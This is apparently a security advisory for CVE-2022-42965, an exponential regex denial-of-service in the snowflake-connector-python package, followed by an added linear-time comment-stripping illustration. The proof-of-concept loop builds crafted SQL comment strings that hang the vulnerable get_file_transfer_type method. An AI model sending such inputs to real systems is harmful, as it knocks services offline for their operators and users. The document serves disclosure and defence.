CVE-2022-42965: snowflake-connector-python ReDoS | XRAY-257185
An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the snowflake-connector-python PyPI package when an attacker can supply arbitrary input to the get_file_transfer_type method.
CVE-2022-42965 | CVSS 5.9
JFrog Severity: medium
Published 15 Oct. 2022 | Last updated 15 Oct. 2022
Exponential ReDoS in snowflake-connector-python leads to denial of service
snowflake-connector-python
snowflake-connector-python (,)
import time
from snowflake.connector.cursor import SnowflakeCursor

# Each iteration adds one more interleaved comment fragment; the time per call
# grows exponentially with i because the comment-stripping regex backtracks.
for i in range(100):
    start_time = time.time()
    sql = '/**/\n' + '\t/*/get\t*/\t/**/\n' * i + '\t*/get\n'
    SnowflakeCursor.get_file_transfer_type(sql)
    print("--- %s seconds ---" % (time.time() - start_time))
No mitigations are supplied for this issue
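The advisory supplies no mitigation, so the following is an added illustration rather than code from the snowflake-connector-python project or its fix. It shows the property a defender would check for when screening untrusted SQL before it reaches the vulnerable method: stripping comments and reading the leading PUT/GET keyword can be done in a single left-to-right pass, which stays linear on the same input shape the PoC uses. The function name classify_file_transfer, its return convention, and the handling of string literals are assumptions made for this example.

```python
import time

# Added illustration, not the snowflake-connector-python project's code or fix.
# It shows that classifying a statement as PUT/GET after comment removal can be
# done in one linear pass, so adversarial comment layouts like the advisory's
# PoC cannot inflate runtime the way a backtracking regex does.


def strip_sql_comments(sql: str) -> str:
    """Remove /* ... */ block comments and -- line comments in one pass.

    Every character is visited once and each comment is skipped with a single
    forward search, so the cost is O(len(sql)) however the comments are
    interleaved. Single-quoted string literals are copied through untouched so
    that comment markers inside them are not misread.
    """
    out = []
    i, n = 0, len(sql)
    while i < n:
        if sql.startswith("/*", i):
            end = sql.find("*/", i + 2)
            if end == -1:            # unterminated block comment: drop the rest
                break
            i = end + 2
        elif sql.startswith("--", i):
            end = sql.find("\n", i)
            if end == -1:            # comment runs to end of input
                break
            i = end                  # keep the newline as whitespace
        elif sql[i] == "'":
            end = sql.find("'", i + 1)
            if end == -1:            # unterminated literal: keep it verbatim
                out.append(sql[i:])
                break
            out.append(sql[i:end + 1])
            i = end + 1
        else:
            out.append(sql[i])
            i += 1
    return "".join(out)


def classify_file_transfer(sql: str):
    """Hypothetical linear-time stand-in for get_file_transfer_type.

    Returns 'PUT' or 'GET' when the first keyword after comment removal is one
    of those, otherwise None. The name and return convention are assumptions
    made for this example, not the library's API.
    """
    words = strip_sql_comments(sql).split()
    if not words:
        return None
    keyword = words[0].upper()
    return keyword if keyword in ("PUT", "GET") else None


def poc_input(i: int) -> str:
    """Rebuild the advisory's PoC string for a given repetition count."""
    return "/**/\n" + "\t/*/get\t*/\t/**/\n" * i + "\t*/get\n"


if __name__ == "__main__":
    # Constructed inputs: the stand-in must still classify ordinary statements.
    print(classify_file_transfer("  /* staged upload */ PUT file:///tmp/a @s"))
    print(classify_file_transfer("-- download\nget @s file:///tmp/"))
    print(classify_file_transfer("SELECT 'get' FROM t"))
    # The PoC shape that is exponential for a backtracking regex stays linear here.
    for i in (100, 1000, 10000):
        start = time.time()
        classify_file_transfer(poc_input(i))
        print("i=%d --- %.4f seconds ---" % (i, time.time() - start))
```

Running the block prints PUT, GET and None for the three constructed statements, then timings for the PoC shape that grow only with the input length. The design point is that each comment is consumed by one forward search instead of a pattern the regex engine can match in many overlapping ways, which is what removes the exponential case.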